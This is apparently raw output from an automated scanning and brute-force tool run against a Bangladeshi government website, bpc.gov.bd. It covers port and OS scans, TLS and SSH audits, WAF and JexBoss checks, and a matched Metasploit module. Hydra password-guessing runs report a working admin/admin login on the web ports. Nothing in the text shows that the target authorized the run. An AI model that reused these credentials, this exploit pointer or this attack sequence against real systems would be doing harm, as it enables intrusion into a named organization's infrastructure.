- 3306/tcp open mysql
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:07 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.20s latency).
- Not shown: 11 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:08 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP
- Running: Linux 2.4.X|2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
- OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
- Network Distance: 12 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 105.68 ms 10.251.200.1
- 2 105.73 ms 185.94.189.129
- 3 104.10 ms 185.206.226.109
- 4 104.97 ms 213.248.70.225
- 5 220.50 ms prs-bb3-link.telia.net (62.115.138.132)
- 6 221.80 ms 80.91.251.243
- 7 204.54 ms atl-b22-link.telia.net (62.115.125.191)
- 8 220.52 ms 80.91.246.75
- 9 221.15 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 217.15 ms 207.210.229.6
- 11 221.88 ms 174.136.31.214
- 12 ... 30
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- # message authentication code algorithms
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:19 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 22/tcp closed ssh
- Too many fingerprints match this host to give specific OS details
- Network Distance: 12 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 102.43 ms 10.251.200.1
- 2 102.68 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 104.63 ms 185.206.226.109
- 4 104.66 ms 213.248.70.225
- 5 229.15 ms prs-bb4-link.telia.net (62.115.138.138)
- 6 218.30 ms 62.115.122.159
- 7 200.12 ms atl-b22-link.telia.net (62.115.125.128)
- 8 221.11 ms 80.91.246.75
- 9 217.75 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 217.74 ms 207.210.229.6
- 11 222.77 ms 174.136.31.214
- 12 221.44 ms 173.237.136.21
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:19 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 53/tcp open domain?
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 109.51 ms 10.251.200.1
- 2 109.59 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 104.85 ms 185.206.226.109
- 4 104.87 ms 213.248.70.225
- 5 221.30 ms prs-bb3-link.telia.net (62.115.138.132)
- 6 219.96 ms 80.91.251.243
- 7 200.12 ms atl-b22-link.telia.net (62.115.125.128)
- 8 223.67 ms 80.91.246.75
- 9 221.92 ms 213.248.71.138
- 10 220.79 ms 207.210.229.6
- 11 220.76 ms infweb6.smtpserve.com (72.29.120.126)
- 12 220.80 ms 173.237.136.21
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.bpc.gov.bd
- The site http://www.bpc.gov.bd is behind a Trustwave ModSecurity
- Number of requests: 6
- ######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://www.bpc.gov.bd...
- _________________ SITE INFO __________________
- IP Title
- 173.237.136.21 Bangladesh Petroleum Corporat
- __________________ VERSION ___________________
- Name Versions Type
- PHP Platform
- jQuery 1.6.3 JavaScript
- ________________ INTERESTING _________________
- URL Note Type
- /login.php Login Page Interesting
- ______________________________________________
- Time: 1.6 sec Urls: 620 Fingerprints: 40401
- ######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Fri, 23 Nov 2018 05:31:07 GMT
- Content-Type: text/html; charset=UTF-8
- Content-Encoding: gzip
- Connection: keep-alive
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [23-11-2018 00:31:49]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.bpc.gov.bd.txt ]
- [ INFO ][ DORK ]::[ site:www.bpc.gov.bd ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.tn ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.co.tz ID: 012984904789461885316:oy3-mu17hxk ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
- [ INFO ] Not a satisfactory result was found!
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [23-11-2018 00:31:58]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.bpc.gov.bd.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:32 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 205 guesses in 184 seconds, average tps: 1.0
- |_pop3-capabilities: USER CAPA RESP-CODES STLS TOP AUTH-RESP-CODE PIPELINING UIDL SASL(PLAIN LOGIN)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 103.05 ms 173.237.136.21
- #######################################################################################################################################
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://www.bpc.gov.bd
- The site https://www.bpc.gov.bd is behind a Trustwave ModSecurity
- Number of requests: 6
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginHSTS
- PluginChromeSha1Deprecation
- PluginSessionResumption
- PluginSessionRenegotiation
- PluginCertInfo
- PluginOpenSSLCipherSuites
- PluginHeartbleed
- PluginCompression
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- www.bpc.gov.bd:443 => 173.237.136.21:443
- SCAN RESULTS FOR WWW.BPC.GOV.BD:443 - 173.237.136.21:443
- --------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 3d184337b914105414d261eec073e98185b0cdc9
- Common Name: bpc.gov.bd
- Issuer: bpc.gov.bd
- Serial Number: 0136C4F852
- Not Before: Jul 5 15:19:17 2018 GMT
- Not After: Jul 5 15:19:17 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['bpc.gov.bd', 'mail.bpc.gov.bd', 'www.bpc.gov.bd']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
- Certificate Chain Received: ['bpc.gov.bd']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- SCAN COMPLETED IN 49.26 S
- -------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server www.bpc.gov.bd on port 443 using SNI name www.bpc.gov.bd
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: bpc.gov.bd
- Altnames: DNS:bpc.gov.bd, DNS:mail.bpc.gov.bd, DNS:www.bpc.gov.bd
- Issuer: bpc.gov.bd
- Not valid before: Jul 5 15:19:17 2018 GMT
- Not valid after: Jul 5 15:19:17 2019 GMT
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.bpc.gov.bd:8080
- The site http://www.bpc.gov.bd:8080 is behind a Trustwave ModSecurity
- Number of requests: 6
- http://www.bpc.gov.bd:8080 [403 Forbidden] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[403 Forbidden], nginx[1.14.0]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server www.bpc.gov.bd on port 8080 using SNI name www.bpc.gov.bd
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: http://www.bpc.gov.bd:8080 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 opened... running tests...
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.bpc.gov.bd:8443
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- http://www.bpc.gov.bd:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server www.bpc.gov.bd on port 8443 using SNI name www.bpc.gov.bd
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: bpc.gov.bd
- Altnames: DNS:bpc.gov.bd, DNS:mail.bpc.gov.bd, DNS:www.bpc.gov.bd
- Issuer: bpc.gov.bd
- Not valid before: Jul 5 15:19:17 2018 GMT
- Not valid after: Jul 5 15:19:17 2019 GMT
- AVAILABLE PLUGINS
- -----------------
- PluginCertInfo
- PluginSessionRenegotiation
- PluginOpenSSLCipherSuites
- PluginHSTS
- PluginSessionResumption
- PluginChromeSha1Deprecation
- PluginHeartbleed
- PluginCompression
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- www.bpc.gov.bd:8443 => 173.237.136.21:8443
- SCAN RESULTS FOR WWW.BPC.GOV.BD:8443 - 173.237.136.21:8443
- ----------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 3d184337b914105414d261eec073e98185b0cdc9
- Common Name: bpc.gov.bd
- Issuer: bpc.gov.bd
- Serial Number: 0136C4F852
- Not Before: Jul 5 15:19:17 2018 GMT
- Not After: Jul 5 15:19:17 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['bpc.gov.bd', 'mail.bpc.gov.bd', 'www.bpc.gov.bd']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
- Certificate Chain Received: ['bpc.gov.bd']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- NULL-SHA256 timeout - timed out
- NULL-SHA timeout - timed out
- NULL-MD5 timeout - timed out
- EXP-RC4-MD5 timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC3-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDHE-ECDSA-NULL-SHA timeout - timed out
- ECDH-RSA-NULL-SHA timeout - timed out
- ECDH-RSA-DES-CBC3-SHA timeout - timed out
- ECDH-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC3-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- AECDH-NULL-SHA timeout - timed out
- AECDH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- SCAN COMPLETED IN 58.03 S
- -------------------------
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: https://www.bpc.gov.bd:8443 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- ######################################################################################################################################
- I, [2018-11-23T00:42:52.764399 #18378] INFO -- : Initiating port scan
- I, [2018-11-23T00:43:53.632428 #18378] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-23_00-42-52.xml
- I, [2018-11-23T00:43:53.633772 #18378] INFO -- : Discovered open port: 173.237.136.21:80
- I, [2018-11-23T00:43:54.601472 #18378] INFO -- : Discovered open port: 173.237.136.21:443
- I, [2018-11-23T00:43:56.407608 #18378] INFO -- : Discovered open port: 173.237.136.21:465
- I, [2018-11-23T00:43:57.796636 #18378] INFO -- : Discovered open port: 173.237.136.21:993
- I, [2018-11-23T00:44:00.018622 #18378] INFO -- : Discovered open port: 173.237.136.21:995
- I, [2018-11-23T00:44:02.253780 #18378] INFO -- : Discovered open port: 173.237.136.21:8443
- I, [2018-11-23T00:44:04.043590 #18378] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- | Linksys WRT54GL | https://173.237.136.21:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
- | Linksys WRT54GL | http://173.237.136.21:80/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:48 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.20s latency).
- Not shown: 16 closed ports, 1 filtered port
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 443/tcp open https
- 993/tcp open imaps
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- #######################################################################################################################################
- [STATUS] 5.53 tries/min, 210 tries in 00:38h, 18 to do in 00:04h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:27:09
- + -- --=[Port 22 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:09
- [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
- [DATA] attacking ssh://www.bpc.gov.bd:22/
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:10
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking ssh://www.bpc.gov.bd:22/
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:10
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://www.bpc.gov.bd:80//
- [80][http-get] host: www.bpc.gov.bd login: admin password: admin
- [STATUS] attack finished for www.bpc.gov.bd (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:27:14
- + -- --=[Port 110 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 08:28:23
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-gets://www.bpc.gov.bd:443//
- [443][http-get] host: www.bpc.gov.bd login: admin password: admin
- [STATUS] attack finished for www.bpc.gov.bd (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 08:28:27
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:18:43
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 16:18:43
- [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
- [DATA] attacking mysql://www.bpc.gov.bd:3306/
- [STATUS] 49.00 tries/min, 49 tries in 00:01h, 29 to do in 00:01h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:19:45
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 16:19:45
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
